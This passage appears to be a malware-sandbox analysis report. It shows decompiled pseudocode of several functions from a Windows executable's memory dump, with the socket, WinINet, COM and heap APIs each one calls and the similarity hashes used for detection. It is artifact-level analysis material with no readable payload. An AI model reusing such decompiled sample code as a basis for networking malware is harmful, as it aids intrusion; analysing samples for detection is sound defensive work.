														_v305 = 0;
													}
													L37:
													return _v305;
												}
											} else {
												_t150 = E004152A0( &_v8);
												E004152D0(_t98, _v304);
												if(_t150 != 0xffffffff) {
													E004152F0();
													_t113 = _v8;
													_t140 = E00409870(_t150, _t113, 0x5a, _v300 | 0x00000002);
													if(_t140 == 1) {
														_push(_t150);
														_t95 = E004150D0(_t113);
													}
													_t144 = _t150;
													goto L34;
												} else {
													_t113 = _v8;
													_v306 = 0x5b;
													goto L46;
												}
											}
										}
									} else {
										L26:
										_v306 = 0x5b;
										goto L46;
									}
								}
							}
						} else {
							_t141 = 0;
							while(E00414B90(1, _t113, 0,  &_v305) != 0) {
								_t80 = _v305;
								 *((char*)(_t151 + _t141 + 0x38)) = _t80;
								if(_t80 == 0) {
									_v304 = 0;
									__imp__getaddrinfo( &_v268, 0, 0,  &_v304);
									if(_t80 != 0) {
										L22:
										_v322 = 0x5b;
									} else {
										_t80 = _v320;
										_t147 = _t80;
										if(_t80 != 0) {
											while( *((intOrPtr*)(_t147 + 4)) != 2) {
												_t147 =  *((intOrPtr*)(_t147 + 0x1c));
												if(_t147 != 0) {
													continue;
												} else {
												}
												goto L21;
											}
											E00410820( &_v305,  *((intOrPtr*)(_t147 + 0x18)) + 4, 4);
											_t80 = _v332;
										}
										L21:
										__imp__freeaddrinfo(_t80);
										if(_t147 == 0) {
											goto L22;
										}
									}
									goto L23;
								} else {
									_t141 = _t141 + 1;
									if(_t141 <= 0xff) {
										continue;
									} else {
										return 0;
									}
								}
								goto L47;
							}
							goto L8;
						}
					}
				}
				L47:
			}

0x00409910
0x00409917
0x00409921
0x0040992c
0x00409934
0x0040993c
0x00409945
0x0040993e
0x0040993e
0x0040993e
0x0040995a
0x0040995c
0x00409967
0x0040999a
0x004099a6
0x00409969
0x00409978
0x00000000
0x00409980
0x00409980
0x00409998
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00409998
0x004099a9
0x004099d0
0x004099d1
0x004099db
0x00409a76
0x00409a7b
0x00409a80
0x00409bcf
0x00409bde
0x00409be6
0x00409beb
0x00409bef
0x00409bf3
0x00409c09
0x00409a86
0x00409a8f
0x00409a99
0x00409aa3
0x00409aa4
0x00409b73
0x00409b78
0x00409b81
0x00409b86
0x00000000
0x00409b8c
0x00409b8e
0x00409b99
0x00409ba1
0x00409bae
0x00409bb7
0x00409bb0
0x00409bb0
0x00409bb0
0x00409ba3
0x00409ba3
0x00409ba4
0x00409ba4
0x00409bbc
0x00409bc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00409bc6
0x00409aaa
0x00409aab
0x00409ac2
0x00409ac4
0x00409acb
0x00000000
0x00409acd
0x00409ad6
0x00409adb
0x00409b3d
0x00409b3d
0x00409b45
0x00000000
0x00409b4b
0x00409b4e
0x00409b50
0x00409b50
0x00409b55
0x00409b63
0x00409b63
0x00409add
0x00409af1
0x00409af3
0x00409afb
0x00409b10
0x00409b19
0x00409b2e
0x00409b33
0x00409b35
0x00409b36
0x00409b36
0x00409b3b
0x00000000
0x00409afd
0x00409afd
0x00409b04
0x00000000
0x00409b04
0x00409afb
0x00409adb
0x00409aad
0x00409aad
0x00409aad
0x00000000
0x00409aad
0x00409aab
0x00409aa4
0x004099e1
0x004099e1
0x004099e3
0x004099f6
0x004099fa
0x00409a00
0x00409a28
0x00409a2c
0x00409a34
0x00409a71
0x00409a71
0x00409a36
0x00409a36
0x00409a3a
0x00409a3e
0x00409a40
0x00409a46
0x00409a4b
0x00000000
0x00000000
0x00409a4d
0x00000000
0x00409a4b
0x00409a5d
0x00409a62
0x00409a62
0x00409a66
0x00409a67
0x00409a6f
0x00000000
0x00000000
0x00409a6f
0x00000000
0x00409a02
0x00409a02
0x00409a09
0x00000000
0x00409a0b
0x00409a17
0x00409a17
0x00409a09
0x00000000
0x00409a00
0x00000000
0x004099e3
0x004099db
0x00409978
0x00000000

APIs

getsockname.WS2_32 ref: 00409934
send.WS2_32(?,00000080,00000008,00000000), ref: 00409BF3

Part of subcall function 00414B90: select.WS2_32 ref: 00414BF1
Part of subcall function 00414B90: recv.WS2_32(?,?,00000007,00000000), ref: 00414C01

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00409A2C
freeaddrinfo.WS2_32(?), ref: 00409A67

Strings

Z, xrefs: 00409BC8

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: freeaddrinfogetaddrinfogetsocknamerecvselectsend
String ID: Z
API String ID: 2962621997-1505515367
Opcode ID: fc6f540948a9d1a067198b6e438f5e8d25525fc32e1956a21b593c0f6b6ed1cb
Instruction ID: fd58340973e5d0e21fa197a060c7f8e3f1e8f88e23ba452a615d9853c28125ca
Opcode Fuzzy Hash: fc6f540948a9d1a067198b6e438f5e8d25525fc32e1956a21b593c0f6b6ed1cb
Instruction Fuzzy Hash: 3B81E6722083404AD720DA25D841BEBB7E4ABC5354F044A3EF995A72C2D67CDE4DC79B

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDC0, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 211
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041FDC0(WCHAR* __ecx, void* __edx, WCHAR** _a4) {
				short _v524;
				char _v532;
				char _v636;
				char _v664;
				char _v684;
				char _v688;
				WCHAR* _v696;
				char _v700;
				char _v704;
				char _v708;
				intOrPtr* _v712;
				WCHAR* _v716;
				intOrPtr* _v724;
				char _v728;
				WCHAR* _v732;
				intOrPtr _v736;
				char _v740;
				void* __ebx;
				void* __esi;
				WCHAR* _t47;
				WCHAR* _t49;
				WCHAR* _t53;
				intOrPtr* _t56;
				WCHAR* _t57;
				intOrPtr* _t58;
				WCHAR* _t63;
				intOrPtr* _t65;
				WCHAR* _t67;
				intOrPtr* _t69;
				WCHAR* _t71;
				WCHAR* _t74;
				WCHAR* _t75;
				WCHAR* _t80;
				WCHAR* _t84;
				WCHAR* _t87;
				signed int _t96;
				signed int _t98;
				WCHAR* _t99;
				WCHAR* _t100;
				intOrPtr _t101;
				WCHAR* _t102;
				WCHAR* _t115;
				WCHAR* _t132;
				signed int _t136;
				WCHAR* _t139;
				WCHAR* _t140;
				WCHAR* _t146;
				char* _t147;
				char* _t148;
				WCHAR* _t150;

				_t102 = __ecx;
				_push(_t96);
				_t47 = __edx + 0x2c;
				if(_t47 != 0) {
					while(1) {
						_t136 =  *_t47 & 0x0000ffff;
						if(_t136 != 0x5c && _t136 != 0x2f) {
							goto L4;
						}
						_t47 =  &(_t47[1]);
					}
				}
				L4:
				_t49 = PathCombineW( &_v524, _t102, _t47);
				__eflags = _t49;
				if(_t49 != 0) {
					_push( &_v532);
					_t139 = E00419940();
					_v696 = _t139;
					__eflags = _t139;
					if(_t139 != 0) {
						_t53 =  *((intOrPtr*)( *((intOrPtr*)( *_t139 + 0xb4))))(_t139,  &_v696);
						__eflags = _t53;
						if(_t53 == 0) {
							_t56 = _v704;
							_t125 =  *( *_t56 + 0x1c);
							_t57 =  *( *( *_t56 + 0x1c))(_t56,  &_v708);
							__eflags = _t57;
							if(_t57 == 0) {
								_t11 =  &(_t57[0x23]); // 0x47
								E00424100(_t11,  &_v684);
								_t146 = _v716;
								_t63 = E00411BF0((_t125 | 0xffffffff) + 0xf, _t146, _t125 | 0xffffffff,  &_v684);
								__eflags = _t63;
								_t98 = _t96 & 0xffffff00 | _t63 == 0x00000000;
								__eflags = _t146;
								if(_t146 != 0) {
									__imp__#6(_t146);
								}
								__eflags = _t98;
								if(_t98 != 0) {
									_t147 =  &_v684;
									_v716 = 0;
									E00424100(0x48, _t147);
									_t65 = _v712;
									_t67 =  *((intOrPtr*)( *((intOrPtr*)( *_t65 + 0x94))))(_t65, _t147,  &_v688);
									__eflags = _t67;
									if(_t67 != 0) {
										_t99 = 0;
										__eflags = 0;
									} else {
										_t99 = E004199F0( &_v700);
									}
									_t148 =  &_v664;
									E00424100(0x49, _t148);
									_t69 = _v724;
									_t71 =  *((intOrPtr*)( *((intOrPtr*)( *_t69 + 0x94))))(_t69, _t148,  &_v704);
									__eflags = _t71;
									if(_t71 != 0) {
										_t140 = 0;
										__eflags = 0;
									} else {
										_t140 = E004199F0( &_v716);
									}
									E00424100(0x4a,  &_v636);
									_t132 = 0x4032e8;
									__eflags = _t140;
									if(_t140 != 0) {
										_t132 = _t140;
									}
									_t115 = 0x4032e8;
									__eflags = _t99;
									if(_t99 != 0) {
										_t115 = _t99;
									}
									_t74 =  *_a4;
									__eflags = _t74;
									if(__eflags == 0) {
										L23:
										_t75 = 0x4032e8;
									} else {
										__eflags =  *_t74;
										_t75 = 0x403964;
										if(__eflags == 0) {
											goto L23;
										}
									}
									_push(_t132);
									_push(_t115);
									_t30 =  &_v740; // 0x4032e8
									_t150 = E00411DC0(__eflags, _t30,  &_v636, _t75);
									__eflags = _t99;
									if(_t99 != 0) {
										__imp__#6(_t99);
									}
									__eflags = _t140;
									if(_t140 != 0) {
										__imp__#6(_t140);
									}
									__eflags = _t150;
									if(_t150 > 0) {
										_t100 = 0;
										E00424100(0x53,  &_v728);
										_t142 =  &(_a4[1]);
										_t80 = E0041FB50(_v736, __eflags,  &_v728,  &(_a4[1]),  &_v740);
										__eflags = _t80;
										if(_t80 != 0) {
											_t100 = 1;
										}
										E00424100(0x52,  &_v728);
										_t84 = E0041FB50(_v736, __eflags,  &_v728, _t142,  &_v740);
										__eflags = _t84;
										if(_t84 != 0) {
											_t100 =  &(_t100[0]);
											__eflags = _t100;
										}
										E00424100(0x51,  &_v728);
										_t87 = E0041FB50(_v736, __eflags,  &_v728, _t142,  &_v740);
										__eflags = _t87;
										if(_t87 != 0) {
											_t100 =  &(_t100[0]);
											__eflags = _t100;
										}
										__eflags = _t100;
										_t101 = _v740;
										if(_t100 != 0) {
											E00410D70(_a4, _t101, 0xffffffff);
										}
										E004107C0(_t101);
									}
									_t139 = _v732;
								}
							}
							_t58 = _v712;
							 *((intOrPtr*)( *((intOrPtr*)( *_t58 + 8))))(_t58);
						}
						 *((intOrPtr*)( *((intOrPtr*)( *_t139 + 8))))(_t139);
					}
				}
				return 1;
			}

0x0041fdc0
0x0041fdcc
0x0041fdcd
0x0041fdd4
0x0041fdd6
0x0041fdd6
0x0041fddc
0x00000000
0x00000000
0x0041fde3
0x0041fde3
0x0041fdd6
0x0041fde8
0x0041fdf2
0x0041fdf8
0x0041fdfa
0x0041fe07
0x0041fe0d
0x0041fe0f
0x0041fe13
0x0041fe15
0x0041fe29
0x0041fe2b
0x0041fe2d
0x0041fe33
0x0041fe39
0x0041fe42
0x0041fe44
0x0041fe46
0x0041fe50
0x0041fe53
0x0041fe5a
0x0041fe67
0x0041fe6c
0x0041fe6e
0x0041fe71
0x0041fe73
0x0041fe76
0x0041fe76
0x0041fe7c
0x0041fe7e
0x0041fe84
0x0041fe8d
0x0041fe95
0x0041fe9a
0x0041feaf
0x0041feb1
0x0041feb3
0x0041fec2
0x0041fec2
0x0041feb5
0x0041febe
0x0041febe
0x0041fec4
0x0041fecd
0x0041fed2
0x0041fee7
0x0041fee9
0x0041feeb
0x0041fefa
0x0041fefa
0x0041feed
0x0041fef6
0x0041fef6
0x0041ff05
0x0041ff0a
0x0041ff0f
0x0041ff11
0x0041ff13
0x0041ff13
0x0041ff15
0x0041ff1a
0x0041ff1c
0x0041ff1e
0x0041ff1e
0x0041ff23
0x0041ff25
0x0041ff27
0x0041ff34
0x0041ff34
0x0041ff29
0x0041ff29
0x0041ff2d
0x0041ff32
0x00000000
0x00000000
0x0041ff32
0x0041ff39
0x0041ff3a
0x0041ff44
0x0041ff51
0x0041ff53
0x0041ff55
0x0041ff58
0x0041ff58
0x0041ff5e
0x0041ff60
0x0041ff63
0x0041ff63
0x0041ff69
0x0041ff6b
0x0041ff7a
0x0041ff7c
0x0041ff8d
0x0041ff94
0x0041ff99
0x0041ff9b
0x0041ff9d
0x0041ff9d
0x0041ffa8
0x0041ffba
0x0041ffbf
0x0041ffc1
0x0041ffc3
0x0041ffc3
0x0041ffc3
0x0041ffce
0x0041ffe0
0x0041ffe5
0x0041ffe7
0x0041ffe9
0x0041ffe9
0x0041ffe9
0x0041ffeb
0x0041ffed
0x0041fff1
0x0041fff8
0x0041fff8
0x0041ffff
0x0041ffff
0x00420004
0x00420004
0x0041fe7e
0x00420008
0x00420012
0x00420012
0x0042001a
0x0042001a
0x0041fe15
0x00420024

APIs

PathCombineW.SHLWAPI(?,?,?), ref: 0041FDF2
SysFreeString.OLEAUT32(?), ref: 0041FE76
SysFreeString.OLEAUT32(00000000), ref: 0041FF58
SysFreeString.OLEAUT32(00000000), ref: 0041FF63

Strings

2@2@2@, xrefs: 0041FF44, 0041FF48

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$CombinePath
String ID: 2@2@2@
API String ID: 16530377-2859081985
Opcode ID: 923ba26d1f45aeedad86daf020485d0242938c5e8364e901f2dc438b450f2b64
Instruction ID: ebc132c2068c1742c74e001bb4f87a602cae578e09e7994492e26e7f82f4237e
Opcode Fuzzy Hash: 923ba26d1f45aeedad86daf020485d0242938c5e8364e901f2dc438b450f2b64
Instruction Fuzzy Hash: 4861D1723042129BD710DF25D880AABB3E9AFC5744F04452EF94597351DB38ED4BCBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004117A0, Relevance: 8.9, APIs: 7, Instructions: 181
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E004117A0(signed int __eax, long __ecx, void** _a4) {
				long _v4;
				long _v8;
				signed int _t29;
				signed int _t30;
				void* _t32;
				signed int _t33;
				signed int _t34;
				void* _t35;
				signed int _t38;
				signed int _t43;
				long _t44;
				long _t46;
				long _t49;
				void** _t52;
				signed int _t58;
				void* _t59;
				void* _t60;
				long _t61;
				long _t62;
				void* _t64;

				_t52 = _a4;
				_t61 = __ecx;
				_t64 = __ecx + __eax * 2;
				_v8 = 0;
				 *_t52 = 0;
				_t46 = 8;
				while(1) {
					_v4 = _t46;
					if(_t61 >= _t64) {
						break;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t29 =  *_t61 & 0x0000ffff;
						if(_t29 != 0x20 && (_t29 < 9 || _t29 > 0xd)) {
							break;
						}
						_t61 = _t61 + 2;
						if(_t61 < _t64) {
							continue;
						} else {
							goto L7;
						}
						L55:
					}
					__eflags = _t61 - _t64;
					if(_t61 >= _t64) {
						break;
					} else {
						_t30 =  *_t61 & 0x0000ffff;
						_t44 = _t61 + 2;
						__eflags = _t30 - 0x27;
						if(_t30 == 0x27) {
							L18:
							_t61 = _t44;
							__eflags = _t44 - _t64;
							if(__eflags < 0) {
								while(1) {
									__eflags =  *_t44 - _t30;
									if( *_t44 == _t30) {
										break;
									}
									_t44 = _t44 + 2;
									__eflags = _t44 - _t64;
									if(_t44 < _t64) {
										continue;
									}
									break;
								}
								__eflags = _t44 - _t64;
							}
							if(__eflags == 0) {
								_t61 = _t61 - 2;
								__eflags = _t61;
							}
						} else {
							__eflags = _t30 - 0x22;
							if(_t30 == 0x22) {
								goto L18;
							} else {
								__eflags = _t44 - _t64;
								if(_t44 < _t64) {
									while(1) {
										_t43 =  *_t44 & 0x0000ffff;
										__eflags = _t43 - 0x20;
										if(_t43 == 0x20) {
											goto L24;
										}
										__eflags = _t43 - 9;
										if(_t43 < 9) {
											L16:
											_t44 = _t44 + 2;
											__eflags = _t44 - _t64;
											if(_t44 < _t64) {
												continue;
											} else {
											}
										} else {
											__eflags = _t43 - 0xd;
											if(_t43 > 0xd) {
												goto L16;
											}
										}
										goto L24;
									}
								}
							}
						}
						L24:
						_t8 = _t46 - 4; // 0x4
						_t58 = _t44 - _t61 >> 1;
						__eflags = _t8;
						_t32 =  *_t52;
						if(_t8 != 0) {
							_push(_t46);
							__eflags = _t32;
							if(_t32 != 0) {
								_t33 = HeapReAlloc( *0x42e6d4, 8, _t32, ??);
							} else {
								_t33 = HeapAlloc( *0x42e6d4, 8, ??);
							}
							__eflags = _t33;
							if(_t33 == 0) {
								goto L48;
							} else {
								 *_a4 = _t33;
								goto L33;
							}
						} else {
							__eflags = _t32;
							if(_t32 != 0) {
								HeapFree( *0x42e6d4, 0, _t32);
							}
							 *_a4 = 0;
							L33:
							__eflags = _t58;
							if(_t58 != 0) {
								_t38 = _t58;
								__eflags = _t61;
								if(_t61 != 0) {
									__eflags = _t58 - 0xffffffff;
									if(_t58 == 0xffffffff) {
										_t38 = 0;
										__eflags =  *_t61;
										if( *_t61 != 0) {
											do {
												_t38 = _t38 + 1;
												__eflags =  *((short*)(_t61 + _t38 * 2));
											} while ( *((short*)(_t61 + _t38 * 2)) != 0);
										}
									}
									_t60 = _t38 + _t38;
									_t33 = _t60 + 2;
									__eflags = _t33;
									if(_t33 != 0) {
										_t33 = HeapAlloc( *0x42e6d4, 8, _t33 + 4);
										__eflags = _t33;
										if(_t33 != 0) {
											_push(_t60);
											_push(_t61);
											goto L45;
										}
									}
								} else {
									_t33 = 0;
								}
							} else {
								_t33 = HeapAlloc( *0x42e6d4, 8, 8);
								__eflags = _t33;
								if(_t33 != 0) {
									_push(2);
									_push(0x4032e8);
									L45:
									_push(_t33);
									_t33 = E00410820();
								}
							}
							_t52 = _a4;
							_t49 = _v4;
							 *(_t49 +  *_t52 - 8) = _t33;
							__eflags = _t33;
							if(_t33 == 0) {
								L48:
								_t59 =  *_a4;
								_t62 = _v8;
								__eflags = _t59;
								if(_t59 != 0) {
									__eflags = _t62;
									if(_t62 != 0) {
										do {
											_t35 =  *(_t59 + _t62 * 4 - 4);
											_t62 = _t62 - 1;
											__eflags = _t35;
											if(_t35 != 0) {
												HeapFree( *0x42e6d4, 0, _t35);
											}
											__eflags = _t62;
										} while (_t62 != 0);
										_t33 = HeapFree( *0x42e6d4, _t62, _t59);
									}
								}
								_t34 = _t33 | 0xffffffff;
								__eflags = _t34;
								return _t34;
							} else {
								_v8 = _v8 + 1;
								_t46 = _t49 + 4;
								_t61 = _t44 + 2;
								continue;
							}
						}
					}
					goto L55;
				}
				L7:
				return _v8;
				goto L55;
			}

0x004117a3
0x004117aa
0x004117ad
0x004117b0
0x004117b8
0x004117be
0x004117c3
0x004117c3
0x004117c9
0x00000000
0x004117cb
0x004117cb
0x004117cb
0x004117d0
0x004117d0
0x004117d0
0x004117d6
0x00000000
0x00000000
0x004117e2
0x004117e7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004117e7
0x004117f7
0x004117f9
0x00000000
0x004117fb
0x004117fb
0x004117fe
0x00411801
0x00411804
0x0041182b
0x0041182b
0x0041182d
0x0041182f
0x00411831
0x00411831
0x00411834
0x00000000
0x00000000
0x00411836
0x00411839
0x0041183b
0x00000000
0x00000000
0x00000000
0x0041183b
0x0041183d
0x0041183d
0x0041183f
0x00411841
0x00411841
0x00411841
0x00411806
0x00411806
0x00411809
0x00000000
0x0041180b
0x0041180b
0x0041180d
0x00411810
0x00411810
0x00411813
0x00411816
0x00000000
0x00000000
0x00411818
0x0041181b
0x00411822
0x00411822
0x00411825
0x00411827
0x00000000
0x00000000
0x00411829
0x0041181d
0x0041181d
0x00411820
0x00000000
0x00000000
0x00411820
0x00000000
0x0041181b
0x00411810
0x0041180d
0x00411809
0x00411844
0x00411848
0x0041184b
0x0041184d
0x0041184f
0x00411851
0x00411873
0x00411874
0x00411876
0x00411892
0x00411878
0x00411880
0x00411880
0x00411898
0x0041189a
0x00000000
0x004118a0
0x004118a4
0x00000000
0x004118a4
0x00411853
0x00411853
0x00411855
0x00411861
0x00411861
0x0041186b
0x004118a6
0x004118a6
0x004118a8
0x004118c7
0x004118c9
0x004118cb
0x004118d1
0x004118d4
0x004118d6
0x004118d8
0x004118db
0x004118e0
0x004118e0
0x004118e1
0x004118e1
0x004118e0
0x004118db
0x004118e8
0x004118eb
0x004118ee
0x004118f0
0x004118ff
0x00411905
0x00411907
0x00411909
0x0041190a
0x00000000
0x0041190a
0x00411907
0x004118cd
0x004118cd
0x004118cd
0x004118aa
0x004118b4
0x004118ba
0x004118bc
0x004118be
0x004118c0
0x0041190b
0x0041190b
0x0041190c
0x0041190c
0x004118bc
0x00411911
0x00411917
0x0041191b
0x0041191f
0x00411921
0x00411932
0x00411936
0x00411938
0x0041193c
0x0041193e
0x00411940
0x00411942
0x00411944
0x00411944
0x00411948
0x00411949
0x0041194b
0x00411956
0x00411956
0x0041195c
0x0041195c
0x00411969
0x00411969
0x00411942
0x00411972
0x00411972
0x00411979
0x00411923
0x00411923
0x00411927
0x0041192a
0x00000000
0x0041192a
0x00411921
0x00411851
0x00000000
0x004117f9
0x004117e9
0x004117f4
0x00000000

APIs

HeapFree.KERNEL32(?,00000000,00000004), ref: 00411861
HeapAlloc.KERNEL32(?,00000008,00000008), ref: 00411880
HeapReAlloc.KERNEL32(?,00000008,00000004,00000008), ref: 00411892
HeapAlloc.KERNEL32(?,00000008,00000008), ref: 004118B4
HeapAlloc.KERNEL32(?,00000008,?), ref: 004118FF
HeapFree.KERNEL32(?,00000000,?), ref: 00411956
HeapFree.KERNEL32(?,-00000001,?), ref: 00411969

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Alloc$Free
String ID:
API String ID: 1549400367-0
Opcode ID: f60de8f0293e2eeba401ae24e18fa927648111e7f0ba04294d2490ef573b5cf3
Instruction ID: 9dc50fb28a03401c9ee00c604aadc78a0ced638830a0e4b606b1ffdf3536ed6e
Opcode Fuzzy Hash: f60de8f0293e2eeba401ae24e18fa927648111e7f0ba04294d2490ef573b5cf3
Instruction Fuzzy Hash: 1D5116B16002119BCB34AF15DD80BABB3A4EB51710F54892BEA51E73A0D738DCC5C7AE

Uniqueness

Uniqueness Score: -1.00%

Function 004173A0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004173A0(void** __eax, char* __edx) {
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				char* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _v52;
				char _v60;
				void* _v68;
				void* _v72;
				void* _v76;
				intOrPtr _v88;
				intOrPtr* _t45;
				void* _t46;
				long _t49;
				long _t55;
				void* _t57;
				intOrPtr _t74;
				void* _t80;
				void* _t88;
				void* _t90;
				void** _t94;
				void* _t95;
				intOrPtr* _t97;

				_t94 = __eax;
				E00410870( &_v60,  &_v60, 0, 0x3c);
				_v72 = 0x3c;
				_v52 = 1;
				_v24 = 1;
				_v16 = 1;
				if(InternetCrackUrlA(__edx, 0, 0,  &_v72) != 0) {
					E00410870(_t43, _t94, 0, 0x10);
					_t45 = _v72;
					_t88 = _v68;
					_t97 = _t45;
					if(_t45 != 0) {
						if(_t88 == 0xffffffff) {
							_t80 = 0;
							if( *_t45 != 0) {
								do {
									_t80 = _t80 + 1;
								} while ( *((char*)(_t80 + _t45)) != 0);
							}
							_t88 = _t80;
						}
						_t10 = _t88 + 1; // 0x1
						_t46 = _t10;
						if(_t46 != 0) {
							_t46 = HeapAlloc( *0x42e6d4, 8, _t46 + 4);
							if(_t46 != 0) {
								_t46 = E00410820(_t46, _t97, _t88);
							}
						}
					} else {
						_t46 = 0;
					}
					 *_t94 = _t46;
					if(_t46 == 0) {
						L20:
						return 0;
					} else {
						_t74 = _v28;
						if(_t74 != 0) {
							while( *_v32 == 0x2f) {
								_v32 = _v32 + 1;
								_t74 = _t74 - 1;
								_v28 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L15;
							}
						}
						L15:
						_t90 = _v20 + _t74 + 1;
						_t49 = _t90 + 1;
						if(_t49 != 0) {
							_t49 = HeapAlloc( *0x42e6d4, 8, _t49 + 4);
							_t74 = _v28;
						}
						_t94[1] = _t49;
						if(_t49 != 0) {
							E00410820(_t49 + 1, _v32, _t74);
							E00410820(_t94[1] + _v40 + 1, _v36, _v32);
							_t55 = _t94[1];
							 *_t55 = 0x2f;
							 *((char*)(_t55 + _t90)) = 0;
							_t57 = _v88 - 3;
							_t94[2] = _v52 + 1;
							_t94[3] = _v76;
							if(_t57 == 0) {
								_t94[3] = 1;
								return 1;
							} else {
								if(_t57 == 1) {
									_t94[3] = 2;
									return 1;
								} else {
									_t94[3] = 0;
									return 1;
								}
							}
						} else {
							_t95 =  *_t94;
							if(_t95 != 0) {
								HeapFree( *0x42e6d4, _t49, _t95);
							}
							goto L20;
						}
					}
				} else {
					return 0;
				}
			}

0x004173a6
0x004173af
0x004173c3
0x004173cb
0x004173cf
0x004173d3
0x004173df
0x004173f0
0x004173f5
0x004173f9
0x00417403
0x00417407
0x00417410
0x00417412
0x00417416
0x00417418
0x00417418
0x00417419
0x00417418
0x0041741f
0x0041741f
0x00417421
0x00417421
0x00417426
0x00417434
0x00417438
0x0041743d
0x0041743d
0x00417438
0x00417409
0x00417409
0x00417409
0x00417442
0x00417446
0x004174a4
0x004174ad
0x00417448
0x00417448
0x0041744e
0x00417450
0x00417459
0x0041745d
0x0041745e
0x00417464
0x00000000
0x00000000
0x00000000
0x00417464
0x00417450
0x00417466
0x0041746a
0x0041746e
0x00417473
0x00417482
0x00417484
0x00417484
0x00417488
0x0041748d
0x004174b6
0x004174d1
0x004174d6
0x004174d9
0x004174dc
0x004174ee
0x004174f1
0x004174f4
0x004174f8
0x0041751c
0x00417526
0x004174fa
0x004174fb
0x0041750e
0x00417518
0x004174fd
0x00417500
0x0041750a
0x0041750a
0x004174fb
0x0041748f
0x0041748f
0x00417493
0x0041749e
0x0041749e
0x00000000
0x00417493
0x0041748d
0x004173e1
0x004173e7
0x004173e7

APIs

InternetCrackUrlA.WININET(?,00000000,00000000), ref: 004173D7
HeapAlloc.KERNEL32(?,00000008,?,?,00000000,00000010,?,?,?,?,00000000,00000000), ref: 00417482
HeapFree.KERNEL32(?,?,?,?,00000000,00000010,?,?,?,?,00000000,00000000), ref: 0041749E

Strings

<, xrefs: 004173C3

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocCrackFreeInternet
String ID: <
API String ID: 2876332909-4251816714
Opcode ID: cc5f9a8f36f33dbca9e3e72d9ceb5da9caec099972d3217e19cf766685f9f917
Instruction ID: 9633b5bfb83e068e29b07d6222b12203e759bdc0c62843f133f9147008ba2725
Opcode Fuzzy Hash: cc5f9a8f36f33dbca9e3e72d9ceb5da9caec099972d3217e19cf766685f9f917
Instruction Fuzzy Hash: 7351F4316083419BD720CB29D880BA7BBF8AF85314F44442EF985C7341D736E981CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041F4B0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041F4B0() {
				char _v696;
				char _v1008;
				long _v1024;
				intOrPtr* _v1044;
				int _v1048;
				char _v1052;
				int _v1064;
				char _v1080;
				intOrPtr* _v1084;
				char _v1088;
				char _v1096;
				void* __esi;
				int _t24;
				int _t33;
				intOrPtr* _t36;
				intOrPtr* _t48;
				void* _t58;
				intOrPtr* _t59;
				void* _t61;
				intOrPtr* _t62;
				void* _t63;
				intOrPtr* _t65;

				_t59 = __imp__CoCreateInstance;
				_v1024 = 0;
				_t24 =  *_t59(0x403944, 0, 0x4401, 0x403954,  &_v1024, _t58, _t63);
				if(_t24 != 0) {
					L12:
					return _t24;
				}
				_t65 = _v1044;
				if(_t65 == 0) {
					goto L12;
				}
				_push(_t24);
				_v1048 = _t24;
				_push(_t24);
				_push(_t65);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t65 + 0xc))))() != 0) {
					L8:
					_t43 =  *( *_t65 + 8);
					 *( *( *_t65 + 8))(_t65);
					_t24 = _v1064;
					_t61 = _t24;
					if(_t24 != 0) {
						if( *_t24 != 0) {
							asm("sbb ecx, ecx");
							E00424100( ~_t43 + 0x3c,  &_v696);
							E0040D880(_t61, 0xcc,  &_v696);
						}
						_t24 = HeapFree( *0x42e6d4, 0, _t61);
					}
					goto L12;
				}
				_t7 =  &_v1052; // 0x403954
				_t33 =  *((intOrPtr*)( *((intOrPtr*)( *_t65 + 0x14))))(_t65, 2, 0, _t7);
				if(_t33 != 0) {
					goto L8;
				}
				_v1064 = _t33;
				_push( &_v1064);
				_push(0x403924);
				_push(0x4401);
				_push(0);
				_push(0x403914);
				if( *_t59() == 0) {
					_t48 = _v1084;
					if(_t48 != 0) {
						_t62 = _t48;
						_v1080 = 0x44;
						_v1008 = 0x118;
						E0041F230(_t48, _t65, _v1088,  &_v1080);
